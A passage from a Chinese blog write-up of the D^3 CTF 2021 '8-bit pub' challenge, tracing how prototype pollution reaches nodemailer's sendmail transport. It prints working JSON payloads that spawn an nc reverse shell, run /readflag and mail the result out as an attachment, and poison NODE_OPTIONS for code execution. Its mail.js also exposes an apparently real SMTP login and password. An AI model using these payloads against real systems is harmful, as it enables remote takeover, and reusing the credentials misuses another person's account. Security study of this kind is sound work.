<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">if</span> (options) &#123;<br>            <span class="hljs-keyword">if</span> (<span class="hljs-keyword">typeof</span> options === <span class="hljs-string">&#x27;string&#x27;</span>) &#123;<br>                <span class="hljs-variable language_">this</span>.<span class="hljs-property">path</span> = options;<br>            &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-keyword">typeof</span> options === <span class="hljs-string">&#x27;object&#x27;</span>) &#123;<br>                <span class="hljs-keyword">if</span> (options.<span class="hljs-property">path</span>) &#123;<br>                    <span class="hljs-variable language_">this</span>.<span class="hljs-property">path</span> = options.<span class="hljs-property">path</span>;<br>                &#125;<br>                <span class="hljs-keyword">if</span> (<span class="hljs-title class_">Array</span>.<span class="hljs-title function_">isArray</span>(options.<span class="hljs-property">args</span>)) &#123;<br>                    <span class="hljs-variable language_">this</span>.<span class="hljs-property">args</span> = options.<span class="hljs-property">args</span>;<br>                &#125;<br>                <span class="hljs-variable language_">this</span>.<span class="hljs-property">winbreak</span> = [<span class="hljs-string">&#x27;win&#x27;</span>, <span class="hljs-string">&#x27;windows&#x27;</span>, <span class="hljs-string">&#x27;dos&#x27;</span>, <span class="hljs-string">&#x27;\r\n&#x27;</span>].<span class="hljs-title function_">includes</span>((options.<span class="hljs-property">newline</span> || <span class="hljs-string">&#x27;&#x27;</span>).<span class="hljs-title function_">toString</span>().<span class="hljs-title function_">toLowerCase</span>());<br>            &#125;<br>        &#125;<br>    &#125;<br></code></pre></td></tr></table></figure>

<p>可以在这里看到要给<code>this.path</code>赋值的条件是<code>options</code>的类型要是对象和<code>option</code>的<code>args</code>属性是数组。</p>
<p>接着要做的是检查如何触发</p>
<p>回到<code>mail.js</code></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">const</span> nodemailer = <span class="hljs-built_in">require</span>(<span class="hljs-string">&quot;nodemailer&quot;</span>);<br><br><span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">send</span>(<span class="hljs-params">contents</span>) &#123;<br>  <span class="hljs-keyword">let</span> transporter = nodemailer.<span class="hljs-title function_">createTransport</span>(&#123;<br>    <span class="hljs-attr">service</span>: <span class="hljs-string">&quot;qq&quot;</span>, <span class="hljs-comment">// Plz use your own smtp server for testing</span><br>    <span class="hljs-attr">port</span>: <span class="hljs-number">465</span>,<br>    <span class="hljs-attr">secureConnection</span>: <span class="hljs-literal">true</span>,<br>    <span class="hljs-attr">auth</span>: &#123;<br>      <span class="hljs-attr">user</span>: <span class="hljs-string">&quot;2449970596@qq.com&quot;</span>,<br>      <span class="hljs-attr">pass</span>: <span class="hljs-string">&quot;qlwwytxigkuzebdf&quot;</span>,<br>    &#125;,<br>  &#125;);<br>  <span class="hljs-keyword">return</span> transporter.<span class="hljs-title function_">sendMail</span>(contents);<br>&#125;<br><br><span class="hljs-variable language_">module</span>.<span class="hljs-property">exports</span> = send;<br></code></pre></td></tr></table></figure>

<p>这边可以继续跟进的地方是<code>createTransport</code>（没办法逐行debug真麻烦。。还要自己找）</p>
<p>在<code>node_modules\nodemailer\lib\nodemailer.js</code>中可以找到如下源码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-variable language_">module</span>.<span class="hljs-property">exports</span>.<span class="hljs-property">createTransport</span> = <span class="hljs-keyword">function</span> (<span class="hljs-params">transporter, defaults</span>) &#123;<br>....<br><br>        <span class="hljs-keyword">if</span> (options.<span class="hljs-property">pool</span>) &#123;<br>            transporter = <span class="hljs-keyword">new</span> <span class="hljs-title class_">SMTPPool</span>(options);<br>        &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (options.<span class="hljs-property">sendmail</span>) &#123;<br>            transporter = <span class="hljs-keyword">new</span> <span class="hljs-title class_">SendmailTransport</span>(options);<br>        &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (options.<span class="hljs-property">streamTransport</span>) &#123;<br>            transporter = <span class="hljs-keyword">new</span> <span class="hljs-title class_">StreamTransport</span>(options);<br>        &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (options.<span class="hljs-property">jsonTransport</span>) &#123;<br>....<br></code></pre></td></tr></table></figure>

<p>只要<code>options.sendmail</code>的值为真，就会实例化<code>SendmailTransport</code>类，也就是我们上面要进行原型链污染的类</p>
<p>至此可以尝试构造原型链污染如下</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>	<span class="hljs-attr">&quot;constructor.prototype.sendmail&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-literal"><span class="hljs-keyword">true</span></span><span class="hljs-punctuation">,</span><br>	<span class="hljs-attr">&quot;constructor.prototype.path&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;sh&quot;</span><span class="hljs-punctuation">,</span><br>	<span class="hljs-attr">&quot;constructor.prototype.args&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">[</span><span class="hljs-string">&quot;-c&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-string">&quot;nc ip port -e /bin/sh&quot;</span><span class="hljs-punctuation">]</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>这个poc是用于反弹shell的，因为我的SMTP服务器配置有问题，所以只能这样做。</p>
<p><img src="/../../img/8-bit%20pub-images/6.png" srcset="/img/loading.gif" lazyload></p>
<p><img src="/../../img/8-bit%20pub-images/5.png" srcset="/img/loading.gif" lazyload></p>
<p>这边放一下其他师傅通过任意读文获得flag的方式</p>
<p>在nodemailer文档中发现使用attachments 可以进行任意文件读取</p>
<p>先把文件写到tmp目录下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs javascript">&#123;<br>    <span class="hljs-string">&quot;constructor.prototype.sendmail&quot;</span>:<span class="hljs-literal">true</span>,<br>    <span class="hljs-string">&quot;constructor.prototype.path&quot;</span>:<span class="hljs-string">&quot;sh&quot;</span>,<br>    <span class="hljs-string">&quot;constructor.prototype.args&quot;</span>:[<br>        <span class="hljs-string">&quot;-c&quot;</span>,<br>        <span class="hljs-string">&quot;/readflag &gt; /tmp/flag.txt&quot;</span><br>    ]<br>&#125;<br></code></pre></td></tr></table></figure>

<p>再利用attachments带出</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs javascript">&#123;<br>    <span class="hljs-string">&quot;to&quot;</span>:<span class="hljs-string">&quot;i@example.com&quot;</span>,<br>    <span class="hljs-string">&quot;subject&quot;</span>:<span class="hljs-string">&quot;flag&quot;</span>,<br>    <span class="hljs-string">&quot;constructor.prototype.attachments&quot;</span>:[<br>        &#123;<br>            <span class="hljs-string">&quot;filename&quot;</span>:<span class="hljs-string">&quot;flag.txt&quot;</span>,<br>            <span class="hljs-string">&quot;path&quot;</span>:<span class="hljs-string">&quot;/tmp/flag.txt&quot;</span><br>        &#125;<br>    ]<br>&#125;<br></code></pre></td></tr></table></figure>



<p>以下是之前构造错误的原型链，没有双引号，等号当冒号用，nc反弹shell格式出错。。用于提醒自己</p>
<figure class="highlight elm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs elm">&#123;<br>	constructor.proto<span class="hljs-keyword">type</span>.path=bash<br>	constructor.proto<span class="hljs-keyword">type</span>.args=[nc,ip,port]<br>&#125;<br></code></pre></td></tr></table></figure>



<h4 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h4><p>还有一个方法是污染原型链，先放个其他师傅的博客，后面再研究</p>
<blockquote>
<p>这里就比较直接了，因为nodemailer是有require<code>child_process</code>库的，那么我们可以使用<a target="_blank" rel="noopener" href="https://blog.p6.is/Abusing-Environment-Variables/">Abusing Environment Variables (p6.is)</a>方法，污染env和shell，先放payload</p>
</blockquote>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><br>    <span class="hljs-attr">&quot;constructor.prototype.sendmail&quot;</span><span class="hljs-punctuation">:</span> True<span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;constructor.prototype.shell&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;node&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;constructor.prototype.env.NODE_DEBUG&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;require(&#x27;child_process&#x27;).execSync(&#x27;nc ip port -e /bin/bash&#x27;);process.exit();//&quot;</span><span class="hljs-punctuation">,</span><br>    <span class="hljs-attr">&quot;constructor.prototype.env.NODE_OPTIONS&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;-r /proc/self/environ&quot;</span><br><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>这里污染了环境变量之后，每次以node执行命令的时候，就会加载<code>NODE_OPTIONS</code>选项，从而执行<code>/proc/self/environ</code>中存在的js代码，那么就很简单了，当默认使用发邮件的时候，spawn会调用默认的shell，也就是&#x2F;bin&#x2F;sh</p>
</blockquote>
<p>参考资料：</p>
<p>47.103.121.189&#x2F;2023&#x2F;04&#x2F;20&#x2F;网鼎杯2023线下半决赛突破题errormsg复现&#x2F;</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/lllffg/article/details/114548517">https://blog.csdn.net/lllffg/article/details/114548517</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>D^3 CTF 2021 8-bit pub复现</div>
      <div>https://sammylingsj.github.io/2023/06/28/D^3 CTF 2021 8-bit pub复现/D^3 CTF 2021 8-bit pub复现/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>s4mmy</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年6月28日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/07/01/%E4%B8%80%E9%81%93nodejs%E6%B1%A1%E6%9F%93+jwt%E7%88%86%E7%A0%B4%E7%9A%84%E9%A2%98/Nodejs%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" title="一道nodejs污染+jwt爆破的题">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">一道nodejs污染+jwt爆破的题</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/06/24/2023CISCN/2023_CISCN_Pollution/" title="2023_CISCN_Pollution">
                        <span class="hidden-mobile">2023_CISCN_Pollution</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>s4mmy</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
